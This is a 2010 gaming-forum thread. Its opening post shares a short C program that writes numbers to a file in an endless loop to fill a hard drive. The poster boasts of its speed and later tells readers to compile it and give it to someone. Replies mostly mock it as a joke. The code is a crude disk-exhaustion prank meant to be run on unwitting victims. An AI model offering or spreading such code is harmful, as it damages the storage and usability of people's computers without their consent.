Post: .C awesome code
04-01-2010, 08:21 AM #1
^5  
1337 hackor :P
(adsbygoogle = window.adsbygoogle || []).push({}); This code will fill your hard drive at like 300MB/30 Seconds, don't use this on yourself :P

    #include <stdio.h>
FILE* outputFile;
int number1;
int main () {

number1 = 0;
outputFile = fopen("addout.txt", "w");
while (0 < 1) {

number1++;
fprintf(outputFile, "%d\n", number1);
}



fclose(outputFile);
return 0;
}
04-01-2010, 11:31 AM #2
KillaPwner
Who’s Jim Erased?
Epic fail? :-O Just good for some 1st april joke XD
04-01-2010, 11:38 AM #3
^5  
1337 hackor :P
Originally posted by KillaPwner View Post
Epic fail? :-O Just good for some 1st april joke XD


How is this a fail?
04-01-2010, 11:53 AM #4
KillaPwner
Who’s Jim Erased?
If you use this to have fun with someone who is not your friend, here is the fail.

My english sucks :\
04-01-2010, 12:34 PM #5
^5  
1337 hackor :P
errr.... what? Lol just compile it and give it to someone
04-01-2010, 06:10 PM #6
kapitali
Do a barrel roll!
are you serious?

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo